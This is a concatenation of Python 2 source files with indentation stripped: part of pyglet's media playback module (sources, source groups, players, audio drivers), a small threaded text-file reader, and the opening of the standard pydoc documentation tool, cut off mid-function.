self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
# faster than fudging aruond with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string. (Python 3: return as bytes)'''
if isinstance(self.data, bytes_type):
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# Meaning of timestamp is dependent on context; and not seen by
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
def __lt__(self, other):
return hash(self) < hash(other)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a Player for
this source and plays it immediately.
:rtype: `Player`
'''
player = Player()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = BytesIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = BytesIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next_source(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
#: :deprecated: Use `next_source` instead.
next = next_source # old API, worked badly with 2to3
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
# Spacialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
#: The player will loop the current stream continuosly.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if isinstance(source, SourceGroup):
self._groups.append(source)
else:
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def delete(self):
self.pause()
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
while self._groups:
del self._groups[0]
def next_source(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next_source()
return
if self.source.video_format:
self._texture = None
pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
#: :deprecated: Use `next_source` instead.
next = next_source # old API, worked badly with 2to3
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
warnings.warn('Player.eos_action is deprecated in favor of SourceGroup.loop and SourceGroup.advance_after_eos',
category=DeprecationWarning)
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next_source()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
def __init__(self, *args, **kwargs):
warnings.warn('Use `Player` instead.', category=DeprecationWarning)
super(ManagedSoundPlayer, self).__init__(*args, **kwargs)
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The forward orientation should be orthagonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The up orientation should be orthagonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except Exception as exp:
if _debug:
print 'Error importing driver %s:\n%s' % (driver_name, str(exp))
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
|
data_reader2.py
|
import os
from Queue import Queue
import sys
from threading import Thread
import time
class DataReader(object):
"""DataReader - simple data reader"""
def __init__(self, num_worker_threads=5):
super(DataReader, self).__init__()
self.num_worker_threads = num_worker_threads
def read_data(self, filenames):
input_queue = Queue()
for item in filenames:
input_queue.put(item)
output_queue = self.process_queue(input_queue)
output = []
while not output_queue.empty():
output.append(output_queue.get())
print(output)
def process_queue(self, input_queue):
output_queue = Queue()
total = input_queue.qsize()
def worker():
while not input_queue.empty():
item = input_queue.get()
current = input_queue.qsize()
os.write(1, '\rprocess(%d/%d): %s...' %(total - current, total, item))
sys.stdout.flush()
with open(item) as f:
data = f.readlines()
output_queue.put((item, data))
input_queue.task_done()
time.sleep(1) # sleep 1 second to see flush demo
for i in range(self.num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
input_queue.join() # block until all tasks are done
print
return output_queue
def main():
data_dir = 'tmp/'
filenames = [os.path.join(data_dir, f) for f in os.listdir(data_dir) if f.endswith('.txt')]
print(filenames)
dr = DataReader()
dr.read_data(filenames)
if __name__ == '__main__':
main()
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
# the _encode function that do nothing.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
